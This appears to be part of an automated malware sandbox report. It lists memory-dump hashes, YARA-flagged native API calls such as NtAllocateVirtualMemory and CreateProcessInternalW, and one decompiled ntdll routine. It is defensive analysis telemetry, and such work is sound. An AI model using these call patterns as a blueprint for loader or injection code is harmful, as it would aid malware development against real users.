                                                                              • Instruction Fuzzy Hash: 2890026128500806D1507199C414B075006E7D4641F51C021E0014558DC656896576F1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 2f8174ff085aa43529a54e79c7f6f7f8638ce6342c4c624baaf19cc561947cd5
                                                                              • Instruction ID: 54ec3ed256d6df5df8d37bc53c03a640bdf2cf645efd759e92b27bad8fcbbce8
                                                                              • Opcode Fuzzy Hash: 2f8174ff085aa43529a54e79c7f6f7f8638ce6342c4c624baaf19cc561947cd5
                                                                              • Instruction Fuzzy Hash: C990027124544006D1507199C444A0BA005B7E4341F51C421E0415558CC6558856B261
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9e3ec94a91f246e3d0086c28f2db3970ddc1c52f389cb00c29ca499000b3b0bc
                                                                              • Instruction ID: 8ed8709d07a9ed7a078d7d3d1556c05683607df1ee6351610208c0b68c8ffdbb
                                                                              • Opcode Fuzzy Hash: 9e3ec94a91f246e3d0086c28f2db3970ddc1c52f389cb00c29ca499000b3b0bc
                                                                              • Instruction Fuzzy Hash: 6290027124540406D1107199C808B475005A7D4342F51C021E5154559EC6A5C8917571
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3c5d1bcd779f2b8a83dd26fb4b671622e3202a03d80f71d59e4e3db1ecff1c84
                                                                              • Instruction ID: 0906ae23ba91a3233cb3e26d464e4886b9e2180222ee0b1d562fc76b3509c9b3
                                                                              • Opcode Fuzzy Hash: 3c5d1bcd779f2b8a83dd26fb4b671622e3202a03d80f71d59e4e3db1ecff1c84
                                                                              • Instruction Fuzzy Hash: F990026124544446D1507299C804F0F9105A7E5242F91C029E4146558CC95588557761
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 54c3c48cb2dd2f457521f119d16ae5302f990a8243326ebbace6e5fefcd4fc5d
                                                                              • Instruction ID: 9cb97e0911c8f7a863c9817c26fb67e25a8827e833a5e7c9571ce7e9a1002987
                                                                              • Opcode Fuzzy Hash: 54c3c48cb2dd2f457521f119d16ae5302f990a8243326ebbace6e5fefcd4fc5d
                                                                              • Instruction Fuzzy Hash: E0900265265000060155B599860490B5445B7DA391391C025F1406594CC66188657361
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 371df96173f320c94793ad9ed7d593c684fbe9efaca7f80939f4d56a893f2204
                                                                              • Instruction ID: 550585e3878699d10e86e0adcfdd1cb0a3a293378617cd8f0252714687fe8a84
                                                                              • Opcode Fuzzy Hash: 371df96173f320c94793ad9ed7d593c684fbe9efaca7f80939f4d56a893f2204
                                                                              • Instruction Fuzzy Hash: 8F900271A490001691507199C814A469006B7E4781B55C021E0504558CC9948A5573E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fe551ee56048534049748bb8c7f7f65fee9dad9db73e6355af3d90fa6f6ffeeb
                                                                              • Instruction ID: 8c7b1b171b30ef49206f13fa1eba31cfe6530f12daa99065c91329b3c58d5d13
                                                                              • Opcode Fuzzy Hash: fe551ee56048534049748bb8c7f7f65fee9dad9db73e6355af3d90fa6f6ffeeb
                                                                              • Instruction Fuzzy Hash: 149002E1245140964510B299C404F0A9505A7E4241B51C026E1044564CC5658851B175
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1d1d5ab5cc7cc20feed391799308b78b432d8b10b1430dbded42ff775b0133df
                                                                              • Instruction ID: cf2dbe57dd51d8e2a4fb9ffc11203562084c10e7ff3dced7e32232b0a09b7866
                                                                              • Opcode Fuzzy Hash: 1d1d5ab5cc7cc20feed391799308b78b432d8b10b1430dbded42ff775b0133df
                                                                              • Instruction Fuzzy Hash: 7F90027124500806D1147199C804A865005A7D4341F51C021E6014659ED6A588917171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7b07ea4f71422a59b0d68333466d2f6a4b976fe4bd2426f55811d8fca1566ab4
                                                                              • Instruction ID: ff64f5f5ff32471214d6c709fb3d14d1b348e9b852e2d293ec82baa86b426193
                                                                              • Opcode Fuzzy Hash: 7b07ea4f71422a59b0d68333466d2f6a4b976fe4bd2426f55811d8fca1566ab4
                                                                              • Instruction Fuzzy Hash: 7F90027524904446D5107599D804E875005A7D4345F51D421E041459CDC6948861B161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 9126b2c2201d0226219994bf6623e8153371eb9b2699bbfcdef9ab0c2a392e38
                                                                              • Instruction ID: 052342e678cf9187717ada033db46855a7430b849b8b9aa1c9218fff01be8a4c
                                                                              • Opcode Fuzzy Hash: 9126b2c2201d0226219994bf6623e8153371eb9b2699bbfcdef9ab0c2a392e38
                                                                              • Instruction Fuzzy Hash: FC90026124904446D1107599D408E065005A7D4245F51D021E1054599DC6758851B171
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: d57cd515f99dd680f5682487e59087a7d6773ddac8d4f2915b976daa2521b252
                                                                              • Instruction ID: dc50ff2618b8245d2463c8d8e2ae9c05240511086bfe35e703504527662113d7
                                                                              • Opcode Fuzzy Hash: d57cd515f99dd680f5682487e59087a7d6773ddac8d4f2915b976daa2521b252
                                                                              • Instruction Fuzzy Hash: 9890027124500407D1107199D508B075005A7D4241F51D421E041455CDD69688517161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ed780b5e215a2da9274a21ef2243f01ae0b3a62df6a733069ea816a0e6b7b3fa
                                                                              • Instruction ID: 5e65c9f227cd0ed0537ff8069e32ca84190fd94a81cca94fa4ec1e9371f9d701
                                                                              • Opcode Fuzzy Hash: ed780b5e215a2da9274a21ef2243f01ae0b3a62df6a733069ea816a0e6b7b3fa
                                                                              • Instruction Fuzzy Hash: BF90026164900406D1507199D418B065015A7D4241F51D021E0014558DC6998A5576E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1d92dec7e3b16569d44fd35f3d7f09123a4e8be3b25643d2eafd76448c4c40d8
                                                                              • Instruction ID: 95a683b27d81680177687f79d1073793fab41e8d7a19b45872e7718bc892d633
                                                                              • Opcode Fuzzy Hash: 1d92dec7e3b16569d44fd35f3d7f09123a4e8be3b25643d2eafd76448c4c40d8
                                                                              • Instruction Fuzzy Hash: 70900271345000569510B6D9D804E4A9105A7F4341B51D025E4004558CC59488617161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 7bc7bc1d3e7b46c26274b9074f437a6d514b08a0958799e764655dffcc98e944
                                                                              • Instruction ID: b582540a66b8fdeac5070419f4576c3f3b0365fd6d4e97d9eb18b06db570bdc8
                                                                              • Opcode Fuzzy Hash: 7bc7bc1d3e7b46c26274b9074f437a6d514b08a0958799e764655dffcc98e944
                                                                              • Instruction Fuzzy Hash: 9B90027135514406D1207199C404B065005A7D5241F51C421E081455CDC6D588917162
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: cefea8671b798f5c9e8f8d3b42fa2272705168de28ab9de170cc254a2cbbd016
                                                                              • Instruction ID: 023844e9b30c8c1408a4dc9698d50e3cdb2ea3c9afced73da6660d673aca3b83
                                                                              • Opcode Fuzzy Hash: cefea8671b798f5c9e8f8d3b42fa2272705168de28ab9de170cc254a2cbbd016
                                                                              • Instruction Fuzzy Hash: 2690027124904846D1507199C404E465015A7D4345F51C021E0054698DD6658D55B6A1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: db1f69420103fde52786b18adc7292a583c39f139e8ae6fa981d5fe3faf0a1ef
                                                                              • Instruction ID: dfa41f4e83a4a768442bfeacbe218a259e7522816fbe0aad57ef4137dd445adb
                                                                              • Opcode Fuzzy Hash: db1f69420103fde52786b18adc7292a583c39f139e8ae6fa981d5fe3faf0a1ef
                                                                              • Instruction Fuzzy Hash: 4090027164900806D1607199C414B465005A7D4341F51C021E0014658DC7958A5576E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 03d63450be5a4265054fd0f4f12ab9a3ab83ccfd36769bcffd4f1f85cfe4c394
                                                                              • Instruction ID: 0642f80cd08d381db3d83c543d7d6afeeb987cf0b7083e3a72c894fe9eb13c09
                                                                              • Opcode Fuzzy Hash: 03d63450be5a4265054fd0f4f12ab9a3ab83ccfd36769bcffd4f1f85cfe4c394
                                                                              • Instruction Fuzzy Hash: AA90027124500846D1107199C404F465005A7E4341F51C026E0114658DC655C8517561
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction ID: 4a7ab07b44d6136e6226d333d157ca90fb9c87a0c67772db8e3f1d1db80acb2d
                                                                              • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                              • Instruction Fuzzy Hash:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              C-Code - Quality: 53%
                                                                              			E017CFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                              				void* _t7;
                                                                              				intOrPtr _t9;
                                                                              				intOrPtr _t10;
                                                                              				intOrPtr* _t12;
                                                                              				intOrPtr* _t13;
                                                                              				intOrPtr _t14;
                                                                              				intOrPtr* _t15;
                                                                              
                                                                              				_t13 = __edx;
                                                                              				_push(_a4);
                                                                              				_t14 =  *[fs:0x18];
                                                                              				_t15 = _t12;
                                                                              				_t7 = E0177CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                              				_push(_t13);
                                                                              				E017C5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                              				_t9 =  *_t15;
                                                                              				if(_t9 == 0xffffffff) {
                                                                              					_t10 = 0;
                                                                              				} else {
                                                                              					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                              				}
                                                                              				_push(_t10);
                                                                              				_push(_t15);
                                                                              				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                              				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                              				return E017C5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                              			}










                                                                              APIs
                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 017CFDFA
                                                                              Strings
                                                                              • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 017CFE2B
                                                                              • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 017CFE01
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                              • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                              • API String ID: 885266447-3903918235
                                                                              • Opcode ID: 040f9a1f733bf94000c2e126ee1664897dc1de3505e3d4df87bff845ab677267
                                                                              • Instruction ID: 326d02498f02f25a2659a37cd36b26988af972938c4fd83efcbee36b9d59a2a3
                                                                              • Opcode Fuzzy Hash: 040f9a1f733bf94000c2e126ee1664897dc1de3505e3d4df87bff845ab677267
                                                                              • Instruction Fuzzy Hash: 25F0FC72200501BFE6201A45DC05F23FF5ADB44B30F14431CF614561E1D962F86086F0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Executed Functions

                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,001E4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001E4B87,007A002E,00000000,00000060,00000000,00000000), ref: 001E9DAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID: .z`$U
                                                                              • API String ID: 823142352-510634365
                                                                              • Opcode ID: 015145e0c0070a3f71fde154bb9fa7a0b3b79945905c1f3a179aea5c2ff68d57
                                                                              • Instruction ID: d71ebe19f2ab2f5f41c203d02e3343a82919ba00879d59cf0997e56e3a478170
                                                                              • Opcode Fuzzy Hash: 015145e0c0070a3f71fde154bb9fa7a0b3b79945905c1f3a179aea5c2ff68d57
                                                                              • Instruction Fuzzy Hash: 8801B2B2204608ABCB08CF88DC95EEB37E9AF8C754F158248FA1D97241C630E811CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtCreateFile.NTDLL(00000060,00000000,.z`,001E4B87,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,001E4B87,007A002E,00000000,00000060,00000000,00000000), ref: 001E9DAD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID: .z`
                                                                              • API String ID: 823142352-1441809116
                                                                              • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                              • Instruction ID: 2b7f2a0e27e4ef62852fb98ced7abf918ab0d3263fb53bb5abe6b51c829fdb98
                                                                              • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                              • Instruction Fuzzy Hash: ADF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630F811CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtReadFile.NTDLL(001E4D42,5EB6522D,FFFFFFFF,001E4A01,?,?,001E4D42,?,001E4A01,FFFFFFFF,5EB6522D,001E4D42,?,00000000), ref: 001E9E55
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: ef3a8350767a8355e72e3ba190e628fb5641346ede6239916ea29cf7f2dfe32b
                                                                              • Instruction ID: a931f728af96581da39bc89f01db5da296e134a26ff71dfef72bef38a1f428cb
                                                                              • Opcode Fuzzy Hash: ef3a8350767a8355e72e3ba190e628fb5641346ede6239916ea29cf7f2dfe32b
                                                                              • Instruction Fuzzy Hash: DBF0E2B2200108ABCB04CF99DC80EEB77ADEF8C354F168248BA0DA7251C630E8118BA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtReadFile.NTDLL(001E4D42,5EB6522D,FFFFFFFF,001E4A01,?,?,001E4D42,?,001E4A01,FFFFFFFF,5EB6522D,001E4D42,?,00000000), ref: 001E9E55
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FileRead
                                                                              • String ID:
                                                                              • API String ID: 2738559852-0
                                                                              • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                              • Instruction ID: 1d42c697143f6ddfc3d7ab8e050e72380578c95b92d8a19d5c6c26251df0c769
                                                                              • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                              • Instruction Fuzzy Hash: D7F0A9B2200108ABCB14DF89DC81DEB77ADEF8C754F158248BA1D97241D630E811CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,001D2D11,00002000,00003000,00000004), ref: 001E9F79
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: f2bdcc85cc9ec973cbb8baaef074dd40280cadf4c2f30b51edc4014a127f123b
                                                                              • Instruction ID: 0f2e20623a7d9ea583b97ca08321e0b9a31258bbef00ad7cf5d067e1455477bd
                                                                              • Opcode Fuzzy Hash: f2bdcc85cc9ec973cbb8baaef074dd40280cadf4c2f30b51edc4014a127f123b
                                                                              • Instruction Fuzzy Hash: E6F01CB1200209AFCB14DF99CC81EEBB7ADEF88754F118149FE5897241C630F921CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,001D2D11,00002000,00003000,00000004), ref: 001E9F79
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateMemoryVirtual
                                                                              • String ID:
                                                                              • API String ID: 2167126740-0
                                                                              • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                              • Instruction ID: 277dc45b5c8566637c4ed452ca3233176a08d23db2ce45c65be7a1d7b3eae69d
                                                                              • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                              • Instruction Fuzzy Hash: 5BF015B2200208ABCB14DF89CC81EAB77ADEF88754F118148BE08A7241C630F810CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtClose.NTDLL(001E4D20,?,?,001E4D20,00000000,FFFFFFFF), ref: 001E9EB5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: 8faeb8586e32b048a39c787d590fa611e83d1afeddafdd92cd28e3f511a79aee
                                                                              • Instruction ID: a3122f67d2a982444991b7caa26036442c92e81461fbd7bf9767845a0a0d1dfd
                                                                              • Opcode Fuzzy Hash: 8faeb8586e32b048a39c787d590fa611e83d1afeddafdd92cd28e3f511a79aee
                                                                              • Instruction Fuzzy Hash: AEE08675100218BBD724DB94CC85EA77B5CEF48B50F154455BA189BA42D630F50086D0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • NtClose.NTDLL(001E4D20,?,?,001E4D20,00000000,FFFFFFFF), ref: 001E9EB5
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Close
                                                                              • String ID:
                                                                              • API String ID: 3535843008-0
                                                                              • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                              • Instruction ID: ce8480c391f892b8f42b0029ae4566a4366c7f259a22a9545780907d8489520b
                                                                              • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                              • Instruction Fuzzy Hash: 90D01275200214ABD710EB99CC85E97775CEF44750F154455BA585B242C530F50086E0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.687120081.0000000004500000.00000040.00000001.sdmp, Offset: 04500000, based on PE: true
                                                                              • Associated: 0000000F.00000002.687484359.000000000461B000.00000040.00000001.sdmp
                                                                              • Associated: 0000000F.00000002.687497204.000000000461F000.00000040.00000001.sdmp
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,001D3AF8), ref: 001EA09D
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID: .z`
                                                                              • API String ID: 3298025750-1441809116
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001D834A
                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001D836B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 001D834A
                                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 001D836B
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                                              • Instruction ID: 531177a919d39e90d497b8083f969d013c143aa30438c82971878025ba4be55d
                                                                              • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                                                              • Instruction Fuzzy Hash: 6801D431A802287BE720A6959C43FBE762C6B10F50F040015FB04BA2C1E794690642E6
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001EA134
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: 007a949610160cdf5e412536fa7d56fb401e089b02d1321ed466605672a53891
                                                                              • Instruction ID: 5471ec44897e25ccfdd19f36d27e9d7870d2e34a8ac4de98deefae2f4f51fc7a
                                                                              • Opcode Fuzzy Hash: 007a949610160cdf5e412536fa7d56fb401e089b02d1321ed466605672a53891
                                                                              • Instruction Fuzzy Hash: E90117B2204549AFCB24DF99D880DEB77A9AF8C750F118259BA4CA7201D630E9158BA1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001EA134
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: f497bde5e983975b2f8647c71344713b189404eeeeda599071133b00268b416b
                                                                              • Instruction ID: 49ecbb83c2634366653b5b2f113c87dcf7f7ea8c57973374289c242431527273
                                                                              • Opcode Fuzzy Hash: f497bde5e983975b2f8647c71344713b189404eeeeda599071133b00268b416b
                                                                              • Instruction Fuzzy Hash: 89019DB2210108AFCB58CF99DC80EEB77A9AF8C754F158258BA0DA7251C630E851CBA0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              APIs
                                                                              • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 001EA134
                                                                              Memory Dump Source
                                                                              • Source File: 0000000F.00000002.685442664.00000000001D0000.00000040.00000001.sdmp, Offset: 001D0000, based on PE: false
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateInternalProcess
                                                                              • String ID:
                                                                              • API String ID: 2186235152-0
                                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                              • Instruction ID: 133c46df1f26f8f46005787f325f46aaed268e13cf2f6ec48fb51e56ce4990ec
                                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                              • Instruction Fuzzy Hash: 1501AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0DA7241C630E851CBA4
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

